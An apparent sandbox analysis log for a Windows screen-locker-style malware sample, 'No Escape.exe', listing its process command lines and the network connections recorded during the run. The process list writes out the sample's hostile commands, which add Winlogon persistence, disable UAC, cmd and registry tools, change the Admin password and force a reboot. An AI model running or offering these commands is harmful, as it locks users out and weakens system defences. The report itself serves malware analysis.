"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=130 --mojo-platform-channel-handle=584 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=131 --mojo-platform-channel-handle=3360 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=132 --mojo-platform-channel-handle=4780 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=133 --mojo-platform-channel-handle=4024 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=134 --mojo-platform-channel-handle=4384 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5096 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6160 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4024 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3340 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4744 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Users\Admin\Downloads\No Escape.exe
"C:\Users\Admin\Downloads\No Escape.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3992 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Windows\system32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\957C.tmp\957D.tmp\957E.vbs //Nologo
C:\Windows\system32\cmd.exe
cmd /c ""C:\Program Files (x86)\hello.bat" "
C:\Windows\system32\attrib.exe
attrib +s +h C:\msg.exe
C:\Windows\system32\attrib.exe
attrib +s +h C:\launch.exe
C:\Windows\regedit.exe
regedit /s hello.reg
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System /v DisableLogonBackgroundImage /t REG_DWORD /d 1
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\Windows\system32\userinit.exe,C:\launch.exe /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\control panel\desktop" /v wallpaper /t REG_SZ /d C:\hello.jpg /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
C:\Windows\system32\reg.exe
reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2
C:\Windows\system32\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\net.exe
net user Admin death
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user Admin death
C:\Windows\system32\shutdown.exe
shutdown /t 0 /r
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 172.217.169.74:443 | ogads-pa.googleapis.com | udp |
| GB | 142.250.179.238:443 | apis.google.com | udp |
| GB | 172.217.169.74:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 216.58.201.110:443 | play.google.com | udp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| GB | 172.217.169.78:443 | ogs.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 216.58.201.99:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| GB | 216.58.201.110:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| GB | 216.58.201.99:443 | ssl.gstatic.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-vtbn0.gstatic.com | udp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.200.46:443 | encrypted-vtbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | bonzibuddy.org | udp |
| US | 198.187.29.31:443 | bonzibuddy.org | tcp |
| US | 198.187.29.31:443 | bonzibuddy.org | tcp |
| US | 198.187.29.31:443 | bonzibuddy.org | tcp |
| US | 198.187.29.31:80 | bonzibuddy.org | tcp |
| US | 198.187.29.31:80 | bonzibuddy.org | tcp |
| US | 198.187.29.31:80 | bonzibuddy.org | tcp |
| US | 198.187.29.31:443 | bonzibuddy.org | tcp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.179.227:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | crappysoftware-miraheze-org.webpkgcache.com | udp |
| GB | 142.250.200.1:443 | crappysoftware-miraheze-org.webpkgcache.com | tcp |
| GB | 142.250.200.1:443 | crappysoftware-miraheze-org.webpkgcache.com | udp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.179.227:443 | id.google.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 142.250.200.38:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| GB | 172.217.16.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | img.youtube.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | bonzi-buddy.updatestar.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| GB | 142.250.178.3:80 | www.gstatic.com | tcp |
| GB | 142.250.179.227:443 | id.google.com | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| DE | 109.199.125.105:443 | bonzi-buddy.updatestar.com | tcp |
| US | 8.8.8.8:53 | www.updatestar.com | udp |
| DE | 109.199.124.234:443 | www.updatestar.com | tcp |
| DE | 109.199.124.234:443 | www.updatestar.com | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| DE | 109.199.124.234:443 | www.updatestar.com | tcp |
| US | 8.8.8.8:53 | w9.updatestar.com | udp |
| GB | 216.58.204.74:443 | ajax.googleapis.com | tcp |
| GB | 216.58.204.66:443 | securepubads.g.doubleclick.net | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.124.234:443 | www.updatestar.com | tcp |
| DE | 109.199.124.234:443 | www.updatestar.com | tcp |
| US | 8.8.8.8:53 | www.gravatar.com | udp |
| US | 192.0.73.2:443 | www.gravatar.com | tcp |
| GB | 216.58.204.66:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| DE | 109.199.125.105:443 | w9.updatestar.com | tcp |
| BE | 74.125.206.155:443 | stats.g.doubleclick.net | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| GB | 142.250.180.3:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | dcadc2bda460e1219ebc0c27c3ac89e5.safeframe.googlesyndication.com | udp |
| GB | 142.250.187.193:443 | dcadc2bda460e1219ebc0c27c3ac89e5.safeframe.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | tcp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.78:443 | fundingchoicesmessages.google.com | udp |
| DE | 109.199.124.234:443 | www.updatestar.com | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| GB | 142.250.200.33:443 | cdn.ampproject.org | tcp |
| GB | 142.250.200.33:443 | cdn.ampproject.org | tcp |
| GB | 142.250.200.33:443 | cdn.ampproject.org | tcp |
| GB | 142.250.200.33:443 | cdn.ampproject.org | tcp |
| GB | 142.250.200.33:443 | cdn.ampproject.org | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| GB | 216.58.204.78:443 | img.youtube.com | udp |
| US | 8.8.8.8:53 | www.chip.de | udp |
| GB | 2.16.247.146:443 | www.chip.de | tcp |
| GB | 2.16.247.146:443 | www.chip.de | tcp |
| US | 8.8.8.8:53 | content.chip.de | udp |
| US | 8.8.8.8:53 | cmp.chip.de | udp |
| US | 8.8.8.8:53 | cp.chip.de | udp |
| US | 8.8.8.8:53 | tags.chip.de | udp |
| NL | 108.156.60.2:443 | cmp.chip.de | tcp |
| DE | 18.245.86.30:443 | tags.chip.de | tcp |
| GB | 79.127.237.132:443 | cp.chip.de | tcp |
| US | 8.8.8.8:53 | im.chip.de | udp |
| GB | 79.127.237.132:443 | cp.chip.de | udp |
| GB | 79.127.237.132:443 | cp.chip.de | tcp |
| NL | 108.156.60.2:443 | cmp.chip.de | tcp |
| US | 8.8.8.8:53 | app.varify.io | udp |
| US | 8.8.8.8:53 | assets.sp.chip.de | udp |
| US | 104.26.8.83:443 | app.varify.io | tcp |
| CZ | 65.9.95.119:443 | assets.sp.chip.de | tcp |
| US | 8.8.8.8:53 | data-2f2ec12966.chip.de | udp |
| DE | 91.215.100.78:443 | data-2f2ec12966.chip.de | tcp |
| US | 8.8.8.8:53 | sp.chip.de | udp |
| DE | 18.198.152.110:443 | sp.chip.de | tcp |
| DE | 91.215.100.78:443 | data-2f2ec12966.chip.de | tcp |
| DE | 18.198.152.110:443 | sp.chip.de | tcp |
| GB | 2.16.247.146:443 | im.chip.de | tcp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| US | 8.8.8.8:53 | static.cleverpush.com | udp |
| US | 8.8.8.8:53 | script.webinstaller.mein-organizer.de | udp |
| NL | 18.239.94.35:443 | static.hotjar.com | tcp |
| US | 104.26.15.31:443 | static.cleverpush.com | tcp |
| NL | 185.158.249.69:443 | script.webinstaller.mein-organizer.de | tcp |
| GB | 2.16.247.162:443 | im.chip.de | tcp |
| US | 8.8.8.8:53 | script.ioam.de | udp |
| DE | 91.215.100.39:443 | script.ioam.de | tcp |
| US | 8.8.8.8:53 | widgets.outbrain.com | udp |
| US | 8.8.8.8:53 | amplify.outbrain.com | udp |
| US | 8.8.8.8:53 | a.bf-tools.net | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| US | 8.8.8.8:53 | a.bf-ad.net | udp |
| NL | 185.158.249.69:443 | script.webinstaller.mein-organizer.de | tcp |
| GB | 23.219.197.58:443 | amplify.outbrain.com | tcp |
| GB | 23.219.197.58:443 | amplify.outbrain.com | tcp |
| GB | 2.16.247.181:443 | a.bf-ad.net | tcp |
| GB | 2.16.247.166:443 | a.bf-ad.net | tcp |
| NL | 13.227.219.28:443 | script.hotjar.com | tcp |
| US | 8.8.8.8:53 | wave.outbrain.com | udp |
| US | 8.8.8.8:53 | tr.outbrain.com | udp |
| US | 8.8.8.8:53 | mds.bf-tools.net | udp |
| US | 8.8.8.8:53 | api.permutive.com | udp |
| US | 8.8.8.8:53 | rtt.bf-tools.net | udp |
| US | 64.74.236.95:443 | tr.outbrain.com | tcp |
| US | 8.8.8.8:53 | partners.wfxtriggers.com | udp |
| US | 64.74.236.95:443 | tr.outbrain.com | tcp |
| US | 8.8.8.8:53 | cdn.permutive.com | udp |
| US | 8.8.8.8:53 | utiq.chip.de | udp |
| DE | 18.198.134.217:443 | mds.bf-tools.net | tcp |
| US | 34.107.254.252:443 | api.permutive.com | tcp |
| GB | 2.16.247.166:443 | rtt.bf-tools.net | tcp |
| US | 151.101.66.132:443 | partners.wfxtriggers.com | tcp |
| US | 104.17.109.19:443 | cdn.permutive.com | tcp |
| DE | 18.158.98.81:443 | utiq.chip.de | tcp |
| US | 8.8.8.8:53 | widget-pixels.outbrain.com | udp |
| US | 8.8.8.8:53 | chip.mycleverpush.com | udp |
| DE | 78.46.198.121:443 | chip.mycleverpush.com | tcp |
| US | 8.8.8.8:53 | mv.outbrain.com | udp |
| US | 151.101.194.132:443 | mv.outbrain.com | tcp |
| US | 8.8.8.8:53 | ad.yieldlab.net | udp |
| GB | 216.58.204.66:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | acdn.adnxs.com | udp |
| GB | 2.16.247.166:443 | rtt.bf-tools.net | tcp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | cdn.brandmetrics.com | udp |
| GB | 2.19.117.70:443 | acdn.adnxs.com | tcp |
| GB | 23.219.198.27:443 | ad.yieldlab.net | tcp |
| US | 104.26.15.31:443 | static.cleverpush.com | tcp |
| US | 8.8.8.8:53 | api.cleverpush.com | udp |
| NL | 18.239.70.203:443 | c.amazon-adsystem.com | tcp |
| US | 172.67.69.191:443 | cdn.brandmetrics.com | tcp |
| US | 104.26.14.31:443 | api.cleverpush.com | tcp |
| GB | 23.219.198.27:443 | ad.yieldlab.net | tcp |
| DE | 18.158.98.81:443 | utiq.chip.de | tcp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| NL | 185.89.210.212:443 | ib.adnxs.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| GB | 2.16.247.166:443 | rtt.bf-tools.net | tcp |
| DE | 185.212.44.250:443 | script.webinstaller.mein-organizer.de | tcp |
| US | 8.8.8.8:53 | ssbsync-global.smartadserver.com | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| US | 8.8.8.8:53 | prebid-match.dotomi.com | udp |
| US | 8.8.8.8:53 | orbidder.otto.de | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| FR | 5.196.111.69:443 | ssbsync-global.smartadserver.com | tcp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| BE | 35.210.58.154:443 | orbidder.otto.de | tcp |
| DK | 37.157.2.228:443 | c1.adform.net | tcp |
| DE | 185.212.44.250:443 | script.webinstaller.mein-organizer.de | tcp |
| NL | 89.207.16.204:443 | prebid-match.dotomi.com | tcp |
| GB | 23.219.198.27:443 | ad.yieldlab.net | tcp |
| GB | 172.217.169.66:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | c8c3489e-f329-40e8-bcfc-1f852e512b01.prmutv.co | udp |
| US | 35.241.9.51:443 | c8c3489e-f329-40e8-bcfc-1f852e512b01.prmutv.co | tcp |
| NL | 18.239.70.203:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | cm.adsafety.net | udp |
| US | 34.107.254.252:443 | api.permutive.com | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | demographics.bf-sugarless-production.aws.bfops.io | udp |
| US | 8.8.8.8:53 | ssum-sec.casalemedia.com | udp |
| DE | 217.79.187.69:443 | cm.adsafety.net | tcp |
| DE | 18.192.221.150:443 | demographics.bf-sugarless-production.aws.bfops.io | tcp |
| US | 172.64.151.101:443 | ssum-sec.casalemedia.com | tcp |
| US | 172.64.151.101:443 | ssum-sec.casalemedia.com | tcp |
| US | 172.64.151.101:443 | ssum-sec.casalemedia.com | tcp |
| NL | 18.238.243.82:443 | config.aps.amazon-adsystem.com | tcp |
| NL | 18.238.243.82:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | mcdp-chidc2.outbrain.com | udp |
| US | 50.31.142.63:443 | mcdp-chidc2.outbrain.com | tcp |
| US | 50.31.142.63:443 | mcdp-chidc2.outbrain.com | tcp |
| US | 8.8.8.8:53 | libs.outbrain.com | udp |
| US | 50.31.142.63:443 | mcdp-chidc2.outbrain.com | tcp |
| US | 50.31.142.63:443 | mcdp-chidc2.outbrain.com | tcp |
| US | 50.31.142.63:443 | mcdp-chidc2.outbrain.com | tcp |
| US | 34.107.254.252:443 | api.permutive.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 35.186.253.211:443 | rtb.openx.net | tcp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| DE | 162.19.138.82:443 | id5-sync.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 104.17.109.19:443 | cdn.permutive.com | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | data.webinstaller.statt-park.de | udp |
| US | 8.8.8.8:53 | sync.outbrain.com | udp |
| US | 172.64.151.101:443 | ssum-sec.casalemedia.com | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| NL | 185.158.249.69:443 | data.webinstaller.statt-park.de | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| US | 8.8.8.8:53 | idsync.rlcdn.com | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| US | 8.8.8.8:53 | dpm.demdex.net | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| GB | 172.217.169.66:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | dis.criteo.com | udp |
| US | 104.17.109.19:443 | cdn.permutive.com | tcp |
| NL | 185.158.249.69:443 | data.webinstaller.statt-park.de | tcp |
| US | 8.8.8.8:53 | creativecdn.com | udp |
| US | 35.244.174.68:443 | idsync.rlcdn.com | tcp |
| US | 8.8.8.8:53 | dsp-cookie.adfarm1.adition.com | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| DE | 162.19.138.82:443 | id5-sync.com | tcp |
| US | 70.42.32.255:443 | b1sync.zemanta.com | tcp |
| IE | 52.212.150.189:443 | dpm.demdex.net | tcp |
| NL | 35.214.136.108:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | adsdkprod.azureedge.net | udp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| IE | 54.76.45.185:443 | sync.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| NL | 18.239.68.199:443 | aax.amazon-adsystem.com | tcp |
| NL | 18.239.68.199:443 | aax.amazon-adsystem.com | tcp |
| US | 13.107.246.64:443 | adsdkprod.azureedge.net | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| DE | 80.82.210.217:443 | dsp-cookie.adfarm1.adition.com | tcp |
| US | 8.8.8.8:53 | crt.rootg2.amazontrust.com | udp |
| NL | 18.239.36.28:80 | crt.rootg2.amazontrust.com | tcp |
| US | 8.8.8.8:53 | loadus.exelator.com | udp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| NL | 35.214.136.108:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | ups.xplosion.de | udp |
| US | 8.8.8.8:53 | functions.adnami.io | udp |
| IE | 54.78.254.47:443 | loadus.exelator.com | tcp |
| GB | 2.19.117.8:443 | functions.adnami.io | tcp |
| IE | 34.241.186.48:443 | ups.xplosion.de | tcp |
| US | 8.8.8.8:53 | x.chip.de | udp |
| GB | 2.16.247.162:443 | x.chip.de | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| DE | 185.212.44.250:443 | data.webinstaller.statt-park.de | tcp |
| DE | 185.212.44.250:443 | data.webinstaller.statt-park.de | tcp |
| US | 8.8.8.8:53 | bidder.criteo.com | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | videoexternalapi.outbrain.com | udp |
| US | 8.8.8.8:53 | dis.eu.criteo.com | udp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| US | 8.8.8.8:53 | chip-cluster.de | udp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| US | 70.42.32.63:443 | videoexternalapi.outbrain.com | tcp |
| NL | 178.250.1.9:443 | dis.eu.criteo.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| DE | 83.125.106.237:443 | chip-cluster.de | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 67.220.228.202:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | cdn.xplosion.de | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | macro.adnami.io | udp |
| US | 8.8.8.8:53 | upload.wikimedia.org | udp |
| US | 8.8.8.8:53 | di-images.sftcdn.net | udp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 151.101.1.91:443 | di-images.sftcdn.net | tcp |
| US | 151.101.1.91:443 | di-images.sftcdn.net | tcp |
| US | 151.101.1.91:443 | di-images.sftcdn.net | tcp |
| US | 151.101.1.91:443 | di-images.sftcdn.net | tcp |
| GB | 2.19.117.9:443 | macro.adnami.io | tcp |
| NL | 185.15.59.240:443 | upload.wikimedia.org | tcp |
| US | 3.165.148.99:443 | cdn.xplosion.de | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| IE | 67.220.228.202:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | ice.360yield.com | udp |
| IE | 63.32.245.173:443 | ice.360yield.com | tcp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| DE | 162.19.138.118:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | s.ad.smaato.net | udp |
| NL | 18.239.94.92:443 | s.ad.smaato.net | tcp |
| US | 8.8.8.8:53 | ssbsync.smartadserver.com | udp |
| FR | 178.32.210.230:443 | ssbsync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | pbc.agma-analytics.de | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| DE | 18.185.167.41:443 | pbc.agma-analytics.de | tcp |
| US | 13.107.21.237:443 | c.bing.com | tcp |
| US | 8.8.8.8:53 | crb.kargo.com | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | id.rlcdn.com | udp |
| US | 8.8.8.8:53 | acdn.adnxs-simple.com | udp |
| DE | 3.77.58.244:443 | crb.kargo.com | tcp |
| GB | 87.248.114.11:443 | ups.analytics.yahoo.com | tcp |
| US | 151.101.65.108:443 | acdn.adnxs-simple.com | tcp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 8.8.8.8:53 | uipglob.semasio.net | udp |
